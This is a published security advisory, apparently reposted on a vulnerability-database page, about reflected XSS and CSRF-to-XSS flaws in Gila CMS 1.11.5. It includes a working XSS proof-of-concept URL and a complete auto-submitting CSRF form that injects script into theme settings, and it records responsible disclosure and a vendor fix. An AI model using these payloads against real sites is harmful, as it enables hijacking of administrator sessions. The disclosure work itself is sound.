| Reporter | Title | Published | Views | Family All 38 |
|---|---|---|---|---|
| Gila CMS 1.11.5 Cross Site Request Forgery / Cross Site Scripting Vulnerabilities | 24 Jun 202000:00 | – | zdt | |
| CVE-2019-20803 | 22 May 202002:55 | – | circl | |
| CVE-2019-20804 | 22 May 202002:55 | – | circl | |
| Piwigo Cross-Site Scripting Vulnerability (CNVD-2019-31999) | 17 Sep 201900:00 | – | cnvd | |
| Piwigo Cross-Site Scripting Vulnerability (CNVD-2019-32000) | 17 Sep 201900:00 | – | cnvd | |
| Gila CMS Cross-Site Scripting Vulnerability (CNVD-2020-34658) | 22 May 202000:00 | – | cnvd | |
| Gila CMS Cross-Site Request Forgery Vulnerability | 22 May 202000:00 | – | cnvd | |
| CVE-2019-13363 | 13 Sep 201912:22 | – | cve | |
| CVE-2019-13364 | 13 Sep 201912:24 | – | cve | |
| CVE-2019-20803 | 21 May 202021:51 | – | cve |
`=====[ Tempest Security Intelligence - ADV-07/2020 ]==========================
GilaCMS - Version 1.11.5
Author: Rodolfo Tavares
Tempest Security Intelligence - Recife, Pernambuco - Brazil
=====[ Table of Contents]==================================================
* Overview
* Detailed description
* Timeline of disclosure
* Thanks & Acknowledgements
* References
=====[ Vulnerability Information]=============================================
* Class: Improper Neutralization of Input During Web Page Generation
('Cross-site Scripting') [CWE-79], Cross-Site Request Forgery
(CSRF) [CWE-352]
* CVSS:6.8.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
* CVE-2019-20804, CVE-2019-20803
=====[ Overview]========================================================
* System affected : GilaCMS - Version 1.11.5
* Software Version : Version 1.11.5 (other versions may also be affected).
* Impacts :
* XSS: Gila CMS before 1.11.6 is vulnerable to reflected XSS via the admin/content/postcategory in the id parameter, which is mishandled by g_preview_them.
* XSS and CSRF: Gila CMS before 1.11.6 allows for CSRF resulting in XSS via the admin/themes URI, leading to full compromise of the admin account.
=====[ Detailed description]=================================================
1- XSS at [http://localhostgila.com/admin/content/postcategory|http://localhostgila.com/admin/content/postcategory*] id parameter:
To exploit the XSS via GET in the endpoint *cm/edit_form/postcategory* and parameter *id*, just insert a double quotes character (") to escape the string the, close the current by adding a ">" then include a javascript payload. Follows an example:
* [http://localhostgila.com/cm/edit_form/postcategory?id=8"><script>alert(1)</script>]
2- CSRF and XSS at admin/themes:
The following HTML code exploits both XSS and CSRF vulnerabilities. The admin/themes form is vulnerable to CSRF due to the lack of anti-CSRF tokens, and to XSS due to no proper validations of its inputs. To exploit these vulnerabilities, an attacker should host the following form and trick the administrator into visit this page.
<html> <body> <script>history.pushState('', '', '/') </script>
<form action="http://localhostgila.com/admin/themes?g_response=content&save_options=startbootstrap-creative" method="POST" enctype="multipart/form-data">
<input type="hidden" name="option[color]" value="#e91428" />
<input type="hidden" name="option[header-title]" value="Test" />
<input type="hidden" name="option[header-text]" value=""><script>alert(document.cookie)</script><!--" />
<input type="hidden" name="option[header-image]" value="" />
<input type="hidden" name="option[about-title]" value="<script>alert(0)<script>" />
<input type="hidden" name="option[about-text]" value="<script>alert(3)<script>" />
<input type="hidden" name="option[service-category]" value="1" />
<input type="hidden" name="option[project-category]"value="1" />
<input type="hidden" name="option[contact-title]"value="<script>alert(4)<script>" />
<input type="hidden" name="option[contact-text]" value="<script>alert(5)<script>" />
<input type="hidden" name="option[contact-email]" value="<script>alert(6)<script>" />
<input type="hidden" name="option[contact-phone]" value="<script>alert(7)<script>" />
<input type="submit" value="Submit request" /></form>
<script>
document.forms[0].submit(); </script>
</body>
</html>
=====[ Timeline of disclosure]===============================================
29/Oct/2019 - Responsible disclosure was initiated with the vendor.
02/Nov/2019 - GilaCms confirmed the issue;
07/Nov/2019 - The vendor fixed the vulnerability CSRF.
07/Nov/2019 - The vendor fixed the vulnerability XSS.
22/May/2020 - CVEs was assigned and reserved as CVE-2019-13364 CVE-2019-13363
=====[ Thanks & Acknowledgements]========================================
* Tempest Security Intelligence [5]
=====[ References ]=====================================================
[1][ [https://cwe.mitre.org/data/definitions/352.html]|https://cwe.mitre.org/data/definitions/352.html]
[2][ [https://cwe.mitre.org/data/definitions/79.html]|https://cwe.mitre.org/data/definitions/79.html]
[3][ [https://github.com/GilaCMS/gila/issues/56]]
[4][ [https://github.com/GilaCMS/gila/issues/57]]
[5][ [https://www.tempest.com.br|https://www.tempest.com.br/]|https://www.tempest.com.br/]
=====[ EOF ]===========================================================
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation